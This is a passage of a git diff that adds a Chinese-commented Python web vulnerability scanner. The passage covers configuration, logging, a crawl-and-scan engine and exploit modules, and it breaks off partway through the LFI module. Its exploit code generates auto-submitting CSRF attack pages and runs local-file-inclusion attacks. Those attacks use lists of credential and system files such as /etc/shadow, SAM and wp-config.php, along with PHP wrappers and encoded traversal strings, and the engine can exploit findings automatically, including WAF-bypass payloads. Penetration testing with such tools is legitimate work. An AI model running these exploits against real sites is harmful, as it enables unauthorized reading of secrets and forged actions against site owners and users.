+            if 'url' in config_data:
+                self.url = config_data['url']
+                
+            if 'depth' in config_data:
+                self.depth = config_data['depth']
+                
+            if 'threads' in config_data:
+                self.threads = config_data['threads']
+                
+            if 'timeout' in config_data:
+                self.timeout = config_data['timeout']
+                
+            if 'user_agent' in config_data:
+                self.user_agent = config_data['user_agent']
+                
+            if 'cookies' in config_data:
+                self.cookies = config_data['cookies']
+                
+            if 'headers' in config_data:
+                self.headers = config_data['headers']
+                
+            if 'proxy' in config_data:
+                self.proxy = config_data['proxy']
+                
+            if 'scan_level' in config_data:
+                self.scan_level = config_data['scan_level']
+                
+            if 'scan_type' in config_data:
+                self.scan_type = config_data['scan_type']
+                
+            if 'payload_level' in config_data:
+                self.payload_level = config_data['payload_level']
+                
+            if 'output_file' in config_data:
+                self.output_file = config_data['output_file']
+                
+            if 'output_format' in config_data:
+                self.output_format = config_data['output_format']
+                
+            if 'verbose' in config_data:
+                self.verbose = config_data['verbose']
+                
+            if 'no_color' in config_data:
+                self.no_color = config_data['no_color']
+            
+            # 高级选项
+            if 'use_browser' in config_data:
+                self.use_browser = config_data['use_browser']
+                
+            if 'exploit' in config_data:
+                self.exploit = config_data['exploit']
+                
+            if 'custom_payloads' in config_data:
+                self.custom_payloads = config_data['custom_payloads']
+                
+            if 'exclude_pattern' in config_data:
+                self.exclude_pattern = config_data['exclude_pattern']
+                
+            if 'include_pattern' in config_data:
+                self.include_pattern = config_data['include_pattern']
+                
+            if 'auth' in config_data:
+                self.auth = config_data['auth']
+            
+            logger.info(f"成功从 {config_file} 加载配置")
+            return True
+        except Exception as e:
+            logger.error(f"加载配置文件时出错: {str(e)}")
+            return False
+    
+    def save_to_file(self, config_file):
+        """
+        将配置保存到文件
+        
+        Args:
+            config_file: 配置文件路径
+            
+        Returns:
+            bool: 是否成功保存
+        """
+        config_data = {
+            # 常规选项
+            'url': self.url,
+            'depth': self.depth,
+            'threads': self.threads,
+            'timeout': self.timeout,
+            'user_agent': self.user_agent,
+            'cookies': self.cookies,
+            'headers': self.headers,
+            'proxy': self.proxy,
+            'scan_level': self.scan_level,
+            'scan_type': self.scan_type,
+            'payload_level': self.payload_level,
+            'output_file': self.output_file,
+            'output_format': self.output_format,
+            'verbose': self.verbose,
+            'no_color': self.no_color,
+            
+            # 高级选项
+            'use_browser': self.use_browser,
+            'exploit': self.exploit,
+            'custom_payloads': self.custom_payloads,
+            'exclude_pattern': self.exclude_pattern,
+            'include_pattern': self.include_pattern,
+            'auth': self.auth
+        }
+        
+        try:
+            with open(config_file, 'w', encoding='utf-8') as f:
+                json.dump(config_data, f, indent=4)
+            
+            logger.info(f"配置已保存到 {config_file}")
+            return True
+        except Exception as e:
+            logger.error(f"保存配置文件时出错: {str(e)}")
+            return False
+    
+    def _parse_cookies(self, cookie_str):
+        """
+        解析Cookie字符串
+        
+        Args:
+            cookie_str: Cookie字符串，格式为"name=value; name2=value2"
+        """
+        if not cookie_str:
+            return
+            
+        try:
+            cookies = {}
+            for cookie in cookie_str.split(';'):
+                if '=' in cookie:
+                    name, value = cookie.strip().split('=', 1)
+                    cookies[name] = value
+            
+            self.cookies = cookies
+        except Exception as e:
+            logger.error(f"解析Cookie时出错: {str(e)}")
+    
+    def _parse_headers(self, headers_str):
+        """
+        解析HTTP头字符串
+        
+        Args:
+            headers_str: HTTP头字符串，格式为"Header1:Value1;Header2:Value2"
+        """
+        if not headers_str:
+            return
+            
+        try:
+            headers = {}
+            for header in headers_str.split(';'):
+                if ':' in header:
+                    name, value = header.strip().split(':', 1)
+                    headers[name] = value
+            
+            self.headers = headers
+        except Exception as e:
+            logger.error(f"解析HTTP头时出错: {str(e)}")
+    
+    def _parse_auth(self, auth_str):
+        """
+        解析基本认证字符串
+        
+        Args:
+            auth_str: 基本认证字符串，格式为"username:password"
+        """
+        if not auth_str:
+            return
+            
+        try:
+            if ':' in auth_str:
+                username, password = auth_str.split(':', 1)
+                self.auth = {
+                    'username': username,
+                    'password': password
+                }
+        except Exception as e:
+            logger.error(f"解析认证信息时出错: {str(e)}")
+    
+    def get_payloads_file(self, payload_type):
+        """
+        获取有效载荷文件路径
+        
+        Args:
+            payload_type: 有效载荷类型，如'xss'、'sqli'
+            
+        Returns:
+            str: 有效载荷文件路径，如果文件不存在则返回None
+        """
+        if self.custom_payloads and os.path.exists(self.custom_payloads):
+            logger.info(f"使用自定义有效载荷文件: {self.custom_payloads}")
+            return self.custom_payloads
+        
+        # 尝试多个位置查找有效载荷文件
+        payload_paths = []
+        
+        # 构建可能的文件名
+        level_filename = f"{payload_type}_level{self.payload_level}.txt"
+        waf_bypass_filename = f"{payload_type}_waf_bypass.txt"
+        level1_filename = f"{payload_type}_level1.txt"
+        
+        # 首先检查项目根目录下的payloads目录
+        root_payload_dir = os.path.join(self.project_root, 'payloads')
+        if os.path.exists(root_payload_dir) and os.path.isdir(root_payload_dir):
+            level_path = os.path.join(root_payload_dir, payload_type, level_filename)
+            waf_path = os.path.join(root_payload_dir, payload_type, waf_bypass_filename)
+            level1_path = os.path.join(root_payload_dir, payload_type, level1_filename)
+            
+            payload_paths.append(level_path)
+            # 尝试特殊的WAF绕过有效载荷
+            if self.payload_level >= 2:
+                payload_paths.append(waf_path)
+            # 始终包含level1作为后备
+            payload_paths.append(level1_path)
+        
+        # 然后检查模块内部的payloads目录
+        module_payload_dir = os.path.join(self.base_dir, 'payloads')
+        if os.path.exists(module_payload_dir) and os.path.isdir(module_payload_dir):
+            level_path = os.path.join(module_payload_dir, payload_type, level_filename)
+            waf_path = os.path.join(module_payload_dir, payload_type, waf_bypass_filename)
+            level1_path = os.path.join(module_payload_dir, payload_type, level1_filename)
+            
+            payload_paths.append(level_path)
+            # 尝试特殊的WAF绕过有效载荷
+            if self.payload_level >= 2:
+                payload_paths.append(waf_path)
+            # 始终包含level1作为后备
+            payload_paths.append(level1_path)
+        
+        # 尝试各个路径，返回第一个存在的文件
+        found_file = None
+        for path in payload_paths:
+            if os.path.exists(path) and os.path.isfile(path):
+                logger.debug(f"找到有效载荷文件: {path}")
+                found_file = path
+                break
+        
+        if not found_file:
+            logger.warning(f"找不到类型为 {payload_type} 级别为 {self.payload_level} 的有效载荷文件")
+            logger.warning(f"尝试搜索的路径: {', '.join(payload_paths)}")
+            
+            # 尝试使用任何可用的有效载荷文件
+            for path in payload_paths:
+                if os.path.exists(path) and os.path.isfile(path):
+                    logger.info(f"使用替代的有效载荷文件: {path}")
+                    return path
+            
+            # 如果仍然找不到，最后一搏：尝试root目录下的任何级别
+            root_payload_type_dir = os.path.join(root_payload_dir, payload_type)
+            if os.path.exists(root_payload_type_dir) and os.path.isdir(root_payload_type_dir):
+                for file in os.listdir(root_payload_type_dir):
+                    if file.endswith('.txt'):
+                        path = os.path.join(root_payload_type_dir, file)
+                        logger.info(f"使用最终备选的有效载荷文件: {path}")
+                        return path
+            
+            # 真的找不到了
+            logger.error(f"没有找到任何适用于{payload_type}的有效载荷文件")
+            return None
+        
+        return found_file 
\ No newline at end of file
diff --git a/xss_scanner/core/logger.py b/xss_scanner/core/logger.py
new file mode 100644
index 0000000..cbc6f2c
--- /dev/null
+++ b/xss_scanner/core/logger.py
@@ -0,0 +1,138 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+日志模块，负责管理日志输出
+"""
+
+import os
+import logging
+import sys
+from datetime import datetime
+
+class ColoredFormatter(logging.Formatter):
+    """彩色日志格式化器"""
+    
+    # 定义颜色代码
+    COLORS = {
+        'DEBUG': '\033[94m',  # 蓝色
+        'INFO': '\033[92m',   # 绿色
+        'WARNING': '\033[93m', # 黄色
+        'ERROR': '\033[91m',  # 红色
+        'CRITICAL': '\033[91m\033[1m', # 红色加粗
+        'RESET': '\033[0m'    # 重置
+    }
+    
+    def __init__(self, fmt=None, datefmt=None, style='%', use_color=True):
+        """
+        初始化格式化器
+        
+        Args:
+            fmt: 日志格式
+            datefmt: 日期格式
+            style: 格式风格
+            use_color: 是否使用彩色输出
+        """
+        super().__init__(fmt, datefmt, style)
+        self.use_color = use_color and sys.platform != 'win32' or os.name == 'posix'
+    
+    def format(self, record):
+        """
+        格式化日志记录
+        
+        Args:
+            record: 日志记录
+            
+        Returns:
+            str: 格式化后的日志
+        """
+        levelname = record.levelname
+        
+        # 使用原始格式化方法格式化日志
+        message = super().format(record)
+        
+        # 如果启用了彩色输出，则添加颜色
+        if self.use_color and levelname in self.COLORS:
+            message = f"{self.COLORS[levelname]}{message}{self.COLORS['RESET']}"
+        
+        return message
+
+
+def setup_logger(log_level=logging.INFO, no_color=False):
+    """
+    设置日志系统
+    
+    Args:
+        log_level: 日志级别
+        no_color: 是否禁用彩色输出
+        
+    Returns:
+        logging.Logger: 日志记录器
+    """
+    # 创建日志记录器
+    logger = logging.getLogger('xss_scanner')
+    logger.setLevel(log_level)
+    
+    # 清除之前的处理器
+    for handler in logger.handlers:
+        logger.removeHandler(handler)
+    
+    # 创建控制台处理器
+    console_handler = logging.StreamHandler()
+    console_handler.setLevel(log_level)
+    
+    # 设置日志格式
+    log_format = '[%(asctime)s] [%(levelname)s] %(message)s'
+    date_format = '%Y-%m-%d %H:%M:%S'
+    
+    # 创建格式化器
+    formatter = ColoredFormatter(
+        fmt=log_format,
+        datefmt=date_format,
+        use_color=not no_color
+    )
+    
+    # 设置处理器的格式化器
+    console_handler.setFormatter(formatter)
+    
+    # 将处理器添加到记录器
+    logger.addHandler(console_handler)
+    
+    return logger
+
+
+def setup_file_logger(log_file, log_level=logging.INFO):
+    """
+    设置文件日志
+    
+    Args:
+        log_file: 日志文件路径
+        log_level: 日志级别
+        
+    Returns:
+        logging.Logger: 日志记录器
+    """
+    # 创建日志记录器
+    logger = logging.getLogger('xss_scanner')
+    
+    # 创建文件处理器
+    try:
+        file_handler = logging.FileHandler(log_file, encoding='utf-8')
+        file_handler.setLevel(log_level)
+        
+        # 设置日志格式
+        log_format = '[%(asctime)s] [%(levelname)s] %(message)s'
+        date_format = '%Y-%m-%d %H:%M:%S'
+        
+        # 创建格式化器
+        formatter = logging.Formatter(fmt=log_format, datefmt=date_format)
+        
+        # 设置处理器的格式化器
+        file_handler.setFormatter(formatter)
+        
+        # 将处理器添加到记录器
+        logger.addHandler(file_handler)
+    except Exception as e:
+        logger.error(f"设置文件日志失败: {str(e)}")
+    
+    return logger 
\ No newline at end of file
diff --git a/xss_scanner/core/scanner_engine.py b/xss_scanner/core/scanner_engine.py
new file mode 100644
index 0000000..436a880
--- /dev/null
+++ b/xss_scanner/core/scanner_engine.py
@@ -0,0 +1,339 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+扫描引擎核心模块
+负责协调各种类型的扫描器和管理扫描过程
+"""
+
+import time
+import logging
+import threading
+import queue
+from concurrent.futures import ThreadPoolExecutor
+from urllib.parse import urlparse, urljoin
+
+from xss_scanner.utils.crawler import Crawler
+from xss_scanner.utils.http_client import HttpClient
+from xss_scanner.scanners.xss_scanner import XSSScanner
+from xss_scanner.scanners.csrf_scanner import CSRFScanner
+from xss_scanner.scanners.sql_injection_scanner import SQLInjectionScanner
+from xss_scanner.scanners.lfi_scanner import LFIScanner
+from xss_scanner.scanners.rfi_scanner import RFIScanner
+from xss_scanner.scanners.ssrf_scanner import SSRFScanner
+from xss_scanner.scanners.xxe_scanner import XXEScanner
+
+logger = logging.getLogger('xss_scanner')
+
+class ScannerEngine:
+    """扫描引擎核心类，负责协调不同类型的扫描器"""
+    
+    def __init__(self, config):
+        """
+        初始化扫描引擎
+        
+        Args:
+            config: 配置对象，包含扫描参数
+        """
+        self.config = config
+        self.http_client = HttpClient(
+            timeout=config.timeout,
+            user_agent=config.user_agent,
+            proxy=config.proxy,
+            cookies=config.cookies,
+            headers=config.headers
+        )
+        self.crawler = Crawler(
+            http_client=self.http_client,
+            max_depth=config.depth,
+            threads=config.threads,
+            exclude_pattern=config.exclude_pattern,
+            include_pattern=config.include_pattern
+        )
+        
+        # 初始化各种扫描器
+        self.scanners = []
+        self.initialize_scanners()
+        
+        # 线程池
+        self.thread_pool = ThreadPoolExecutor(max_workers=config.threads)
+        
+        # 存储扫描结果
+        self.results = {
+            'target': None,
+            'start_time': None,
+            'end_time': None,
+            'scan_info': {
+                'scan_level': config.scan_level,
+                'scan_type': config.scan_type,
+                'threads': config.threads,
+                'depth': config.depth
+            },
+            'vulnerabilities': [],
+            'statistics': {
+                'pages_scanned': 0,
+                'forms_tested': 0,
+                'parameters_tested': 0,
+                'vulnerabilities_found': 0
+            }
+        }
+        
+        # 存储已扫描的URL、表单和参数，防止重复扫描
+        self.scanned_urls = set()
+        self.scanned_forms = set()
+        self.scanned_param_combinations = set()
+    
+    def initialize_scanners(self):
+        """初始化所有扫描器"""
+        # 添加XSS扫描器
+        self.scanners.append(XSSScanner(
+            http_client=self.http_client,
+            payload_level=self.config.payload_level,
+            use_browser=self.config.use_browser
+        ))
+        
+        # 根据配置添加其他类型的扫描器
+        if self.config.scan_type in ['all', 'csrf']:
+            self.scanners.append(CSRFScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'sqli']:
+            self.scanners.append(SQLInjectionScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'lfi']:
+            self.scanners.append(LFIScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'rfi']:
+            self.scanners.append(RFIScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'ssrf']:
+            self.scanners.append(SSRFScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'xxe']:
+            self.scanners.append(XXEScanner(self.http_client))
+    
+    def scan(self, target_url):
+        """
+        对目标进行扫描
+        
+        Args:
+            target_url: 目标URL
+            
+        Returns:
+            dict: 扫描结果
+        """
+        self.results['target'] = target_url
+        self.results['start_time'] = time.time()
+        
+        # 爬取目标站点
+        logger.info(f"开始爬取目标站点: {target_url}")
+        pages = self.crawler.crawl(target_url)
+        
+        # 去重处理爬取的页面
+        unique_pages = []
+        page_urls = set()
+        
+        for page in pages:
+            url = page['url']
+            # 标准化URL以便更好地去重
+            parsed_url = urlparse(url)
+            normalized_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+            
+            if normalized_url not in page_urls:
+                page_urls.add(normalized_url)
+                unique_pages.append(page)
+        
+        self.results['statistics']['pages_scanned'] = len(unique_pages)
+        logger.info(f"爬取完成，发现 {len(unique_pages)} 个唯一页面")
+        
+        # 对每个页面进行扫描
+        for page in unique_pages:
+            page_url = page['url']
+            if page_url in self.scanned_urls:
+                logger.debug(f"跳过已扫描的页面: {page_url}")
+                continue
+                
+            self.scanned_urls.add(page_url)
+            logger.debug(f"扫描页面: {page_url}")
+            
+            # 对页面中的表单进行测试
+            for form in page.get('forms', []):
+                # 通过表单操作和ID创建唯一标识符
+                form_id = self._get_form_identifier(page_url, form)
+                
+                if form_id in self.scanned_forms:
+                    logger.debug(f"跳过已扫描的表单: {form_id}")
+                    continue
+                    
+                self.scanned_forms.add(form_id)
+                self.results['statistics']['forms_tested'] += 1
+                self._scan_form(page_url, form)
+            
+            # 对URL参数进行测试
+            if page.get('params', []):
+                params_to_scan = []
+                for param in page.get('params', []):
+                    # 创建URL参数组合的唯一标识符
+                    param_id = f"{page_url}:{param}"
+                    
+                    if param_id in self.scanned_param_combinations:
+                        logger.debug(f"跳过已扫描的参数: {param_id}")
+                        continue
+                        
+                    self.scanned_param_combinations.add(param_id)
+                    params_to_scan.append(param)
+                
+                if params_to_scan:
+                    self._scan_params(page_url, params_to_scan)
+                    self.results['statistics']['parameters_tested'] += len(params_to_scan)
+        
+        # 如果配置了漏洞利用，则尝试利用发现的漏洞
+        if self.config.exploit and self.results['vulnerabilities']:
+            self._exploit_vulnerabilities()
+        
+        self.results['end_time'] = time.time()
+        self.results['statistics']['vulnerabilities_found'] = len(self.results['vulnerabilities'])
+        
+        return self.results
+    
+    def _get_form_identifier(self, url, form):
+        """
+        生成表单的唯一标识符
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            
+        Returns:
+            str: 表单唯一标识符
+        """
+        form_id = form.get('id', '')
+        form_action = form.get('action', '')
+        form_method = form.get('method', 'get')
+        
+        # 将表单字段排序后连接，生成指纹
+        fields = sorted([f"{field['name']}:{field['type']}" for field in form.get('fields', [])])
+        fields_str = ','.join(fields)
+        
+        return f"{url}:{form_id}:{form_action}:{form_method}:{fields_str}"
+    
+    def _scan_form(self, url, form):
+        """
+        扫描表单
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+        """
+        logger.debug(f"扫描表单: {form.get('id', 'unknown')}")
+        
+        # 对表单中的每个输入字段进行测试
+        for field in form.get('fields', []):
+            if field['type'] in ['text', 'search', 'url', 'email', 'password', 'tel', 'number']:
+                for scanner in self.scanners:
+                    # 跳过不适用于表单的扫描器
+                    if not scanner.can_scan_form():
+                        continue
+                        
+                    result = scanner.scan_form(url, form, field)
+                    if result:
+                        # 检查是否为重复的漏洞
+                        is_duplicate = False
+                        for vuln in self.results['vulnerabilities']:
+                            if (vuln['type'] == result['type'] and 
+                                vuln.get('url') == result.get('url')):
+                                # 安全检查location键
+                                if 'location' in vuln and 'location' in result:
+                                    if vuln['location'] == result['location']:
+                                        is_duplicate = True
+                                        break
+                                # 如果没有location，比较其他可用的键
+                                elif vuln.get('form_id') == result.get('form_id'):
+                                    is_duplicate = True
+                                    break
+                                
+                        if not is_duplicate:
+                            self.results['vulnerabilities'].append(result)
+                            logger.warning(f"在表单中发现漏洞: {result['type']} - {result['description']}")
+    
+    def _scan_params(self, url, params):
+        """
+        扫描URL参数
+        
+        Args:
+            url: 页面URL
+            params: URL参数列表
+        """
+        logger.debug(f"扫描URL参数: {', '.join(params)}")
+        
+        for param in params:
+            for scanner in self.scanners:
+                # 跳过不适用于URL参数的扫描器
+                if not scanner.can_scan_params():
+                    continue
+                    
+                result = scanner.scan_parameter(url, param)
+                if result:
+                    # 检查是否为重复的漏洞
+                    is_duplicate = False
+                    for vuln in self.results['vulnerabilities']:
+                        if (vuln['type'] == result['type'] and 
+                            vuln.get('url') == result.get('url')):
+                            # 安全检查parameter键
+                            if 'parameter' in vuln and 'parameter' in result:
+                                if vuln['parameter'] == result['parameter']:
+                                    is_duplicate = True
+                                    break
+                            # 如果没有parameter，比较其他可用的键
+                            elif vuln.get('vulnerability_id') == result.get('vulnerability_id'):
+                                is_duplicate = True
+                                break
+                            
+                    if not is_duplicate:
+                        self.results['vulnerabilities'].append(result)
+                        logger.warning(f"在URL参数中发现漏洞: {result['type']} - {result['description']}")
+    
+    def _exploit_vulnerabilities(self):
+        """尝试利用发现的漏洞"""
+        logger.info("尝试利用发现的漏洞...")
+        
+        for vuln in self.results['vulnerabilities']:
+            # 根据漏洞类型选择合适的利用模块
+            exploit_module = self._get_exploit_module(vuln['type'])
+            if exploit_module:
+                exploit_result = exploit_module.exploit(vuln)
+                if exploit_result:
+                    vuln['exploit_result'] = exploit_result
+                    logger.warning(f"成功利用漏洞: {vuln['type']} - {exploit_result['description']}")
+    
+    def _get_exploit_module(self, vuln_type):
+        """
+        根据漏洞类型获取对应的利用模块
+        
+        Args:
+            vuln_type: 漏洞类型
+            
+        Returns:
+            对应的利用模块实例
+        """
+        if vuln_type == 'XSS':
+            from xss_scanner.exploits.xss_exploit import XSSExploit
+            return XSSExploit(self.http_client)
+        elif vuln_type == 'CSRF':
+            from xss_scanner.exploits.csrf_exploit import CSRFExploit
+            return CSRFExploit(self.http_client)
+        elif vuln_type == 'SQL_INJECTION':
+            from xss_scanner.exploits.sqli_exploit import SQLInjectionExploit
+            return SQLInjectionExploit(self.http_client)
+        elif vuln_type == 'LFI':
+            from xss_scanner.exploits.lfi_exploit import LFIExploit
+            return LFIExploit(self.http_client)
+        elif vuln_type == 'RFI':
+            from xss_scanner.exploits.rfi_exploit import RFIExploit
+            return RFIExploit(self.http_client)
+        elif vuln_type == 'SSRF':
+            from xss_scanner.exploits.ssrf_exploit import SSRFExploit
+            return SSRFExploit(self.http_client)
+        elif vuln_type == 'XXE':
+            from xss_scanner.exploits.xxe_exploit import XXEExploit
+            return XXEExploit(self.http_client)
+        return None 
\ No newline at end of file
diff --git a/xss_scanner/exploits/csrf_exploit.py b/xss_scanner/exploits/csrf_exploit.py
new file mode 100644
index 0000000..904d7ef
--- /dev/null
+++ b/xss_scanner/exploits/csrf_exploit.py
@@ -0,0 +1,111 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+CSRF漏洞利用模块
+"""
+
+import logging
+import re
+import random
+import string
+from urllib.parse import urlparse, parse_qsl, urlencode
+
+logger = logging.getLogger('xss_scanner')
+
+class CSRFExploit:
+    """CSRF漏洞利用类"""
+    
+    def __init__(self, http_client):
+        """
+        初始化CSRF漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+    def exploit(self, vulnerability):
+        """
+        利用CSRF漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果
+        """
+        logger.info(f"尝试利用CSRF漏洞: {vulnerability['url']}")
+        
+        url = vulnerability.get('url')
+        form_action = vulnerability.get('form_action')
+        form_method = vulnerability.get('form_method', 'POST')
+        
+        if not url or not form_action:
+            return {
+                'success': False,
+                'message': '缺少必要的漏洞信息(URL或form_action)',
+                'poc': None
+            }
+            
+        # 生成CSRF利用PoC
+        poc = self._generate_csrf_poc(vulnerability)
+        
+        return {
+            'success': True,
+            'message': '成功生成CSRF漏洞利用PoC',
+            'poc': poc
+        }
+        
+    def _generate_csrf_poc(self, vulnerability):
+        """
+        生成CSRF漏洞利用PoC
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            str: CSRF PoC HTML
+        """
+        form_action = vulnerability.get('form_action')
+        form_method = vulnerability.get('form_method', 'POST').upper()
+        form_fields = vulnerability.get('form_fields', [])
+        
+        # 生成随机ID以防止冲突
+        form_id = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
+        
+        html = f"""
+<!DOCTYPE html>
+<html>
+<head>
+    <title>CSRF PoC</title>
+    <meta charset="UTF-8">
+</head>
+<body>
+    <h1>CSRF漏洞利用演示</h1>
+    此页面将自动提交表单以利用CSRF漏洞
+    <form id="{form_id}" action="{form_action}" method="{form_method}" style="display:none">
+"""
+        
+        # 添加表单字段
+        for field in form_fields:
+            field_name = field.get('name', '')
+            field_value = field.get('value', '')
+            if field_name:
+                html += f'        <input type="hidden" name="{field_name}" value="{field_value}">\n'
+                
+        html += f"""    </form>
+    <script>
+        // 页面加载后自动提交表单
+        window.onload = function() {{
+            document.getElementById("{form_id}").submit();
+        }};
+    </script>
+    <noscript>
+        请启用JavaScript以自动提交表单，或者点击下面的按钮手动提交
+        <button type="submit" form="{form_id}">提交表单</button>
+    </noscript>
+</body>
+</html>
+"""
+        return html 
\ No newline at end of file
diff --git a/xss_scanner/exploits/lfi_exploit.py b/xss_scanner/exploits/lfi_exploit.py
new file mode 100644
index 0000000..c845d12
--- /dev/null
+++ b/xss_scanner/exploits/lfi_exploit.py
@@ -0,0 +1,493 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+LFI（本地文件包含）漏洞利用模块
+"""
+
+import logging
+import re
+import urllib.parse
+import random
+import string
+import base64
+
+logger = logging.getLogger('xss_scanner')
+
+class LFIExploit:
+    """LFI漏洞利用类"""
+    
+    def __init__(self, http_client):
+        """
+        初始化LFI漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 敏感文件列表
+        self.sensitive_files = [
+            # Linux系统文件
+            "/etc/passwd",
+            "/etc/shadow",
+            "/etc/hosts",
+            "/etc/issue",
+            "/etc/group",
+            "/etc/motd",
+            "/proc/self/environ",
+            "/proc/version",
+            "/proc/cmdline",
+            "/proc/sched_debug",
+            "/proc/mounts",
+            "/proc/net/tcp",
+            "/proc/net/udp",
+            "/proc/net/fib_trie",
+            "/proc/net/route",
+            
+            # Windows系统文件
+            "C:\\Windows\\system32\\drivers\\etc\\hosts",
+            "C:\\Windows\\win.ini",
+            "C:\\boot.ini",
+            "C:\\Windows\\System32\\config\\SAM",
+            "C:\\Windows\\repair\\SAM",
+            "C:\\Windows\\System32\\config\\RegBack\\SAM",
+            
+            # Web服务器配置文件
+            "/etc/httpd/conf/httpd.conf",
+            "/etc/apache2/apache2.conf",
+            "/etc/nginx/nginx.conf",
+            "/usr/local/etc/nginx/nginx.conf",
+            "/usr/local/nginx/conf/nginx.conf",
+            
+            # Web应用配置文件
+            "/var/www/html/config.php",
+            "/var/www/html/wp-config.php",
+            "/var/www/html/configuration.php",
+            "/var/www/config/config.ini",
+            ".env",
+            "web.config",
+            "config.json",
+            "settings.py",
+            
+            # 日志文件
+            "/var/log/apache2/access.log",
+            "/var/log/apache2/error.log",
+            "/var/log/nginx/access.log",
+            "/var/log/nginx/error.log",
+            "/var/log/httpd/access_log",
+            "/var/log/httpd/error_log",
+            "/var/log/apache/access.log",
+            "/var/log/apache/error.log",
+            "/usr/local/apache/log/error_log",
+            "/usr/local/apache2/log/error_log"
+        ]
+        
+        # PHP封装器
+        self.php_wrappers = [
+            "php://filter/convert.base64-encode/resource=",
+            "php://filter/read=convert.base64-encode/resource=",
+            "phar://",
+            "zip://",
+            "data://text/plain;base64,"
+        ]
+        
+        # 目录遍历模式
+        self.traversal_patterns = [
+            "../",
+            "..\\",
+            "..%2f",
+            "..%5c",
+            "%2e%2e%2f",
+            "%2e%2e/",
+            "..%252f",
+            "%252e%252e%252f",
+            "....//",
+            "....\\\\",
+            ".../",
+            "...\\",
+            "%c0%ae%c0%ae/",
+            "%25c0%25ae%25c0%25ae/"
+        ]
+        
+        # 常见参数名
+        self.common_parameters = [
+            "file", 
+            "page", 
+            "path", 
+            "filepath", 
+            "filename", 
+            "load", 
+            "include", 
+            "require", 
+            "doc",
+            "document", 
+            "folder", 
+            "root", 
+            "cont", 
+            "content", 
+            "layout",
+            "mod", 
+            "module", 
+            "conf", 
+            "config",
+            "url", 
+            "uri", 
+            "source", 
+            "src",
+            "show", 
+            "view", 
+            "template"
+        ]
+        
+    def exploit(self, vulnerability):
+        """
+        利用LFI漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果
+        """
+        logger.info(f"尝试利用LFI漏洞: {vulnerability['url']}")
+        
+        url = vulnerability.get('url')
+        parameter = vulnerability.get('parameter')
+        payload = vulnerability.get('payload', '')
+        
+        if not url or not parameter:
+            return {
+                'success': False,
+                'message': '缺少必要的漏洞信息(URL或参数名)',
+                'data': None
+            }
+            
+        # 尝试不同的敏感文件
+        for file_path in self.sensitive_files[:10]:  # 只尝试前10个文件
+            result = self._try_file_access(url, parameter, file_path)
+            if result and result['success']:
+                return result
+                
+        # 如果直接尝试失败，尝试使用PHP包装器（如果目标可能是PHP应用）
+        for wrapper in self.php_wrappers[:3]:  # 只尝试前3个包装器
+            for file_path in self.sensitive_files[:5]:  # 只尝试前5个文件
+                result = self._try_wrapper_access(url, parameter, wrapper, file_path)
+                if result and result['success']:
+                    return result
+                    
+        # 如果直接访问和包装器都失败，尝试使用深度目录遍历
+        for traversal in self.traversal_patterns[:5]:  # 只尝试前5个遍历模式
+            # 尝试不同深度
+            for depth in range(1, 11):  # 1到10层深度
+                traversal_path = traversal * depth
+                for file_path in self.sensitive_files[:3]:  # 只尝试前3个文件
+                    result = self._try_traversal_access(url, parameter, traversal_path, file_path)
+                    if result and result['success']:
+                        return result
+                        
+        # 如果所有尝试都失败，返回失败结果
+        return {
+            'success': False,
+            'message': '未能成功利用LFI漏洞',
+            'data': None
+        }
+        
+    def _try_file_access(self, url, parameter, file_path):
+        """
+        尝试直接访问文件
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            file_path: 文件路径
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试访问文件: {file_path}")
+            
+            # 构建注入URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = file_path
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 发送请求
+            response = self.http_client.get(new_url)
+            
+            # 检查响应是否含有敏感文件内容
+            if response and response.status_code == 200:
+                file_content = self._extract_file_content(response.text, file_path)
+                if file_content:
+                    logger.info(f"成功读取文件: {file_path}")
+                    return {
+                        'success': True,
+                        'message': f'成功利用LFI漏洞读取文件: {file_path}',
+                        'data': {
+                            'file_path': file_path,
+                            'file_content': file_content[:1000] + ('...' if len(file_content) > 1000 else ''),
+                            'full_content_length': len(file_content)
+                        },
+                        'poc': new_url
+                    }
+                    
+        except Exception as e:
+            logger.error(f"尝试访问文件时出错: {str(e)}")
+            
+        return None
+        
+    def _try_wrapper_access(self, url, parameter, wrapper, file_path):
+        """
+        尝试使用PHP包装器访问文件
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            wrapper: PHP包装器
+            file_path: 文件路径
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            payload = wrapper + file_path
+            logger.info(f"尝试使用包装器访问文件: {payload}")
+            
+            # 构建注入URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = payload
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
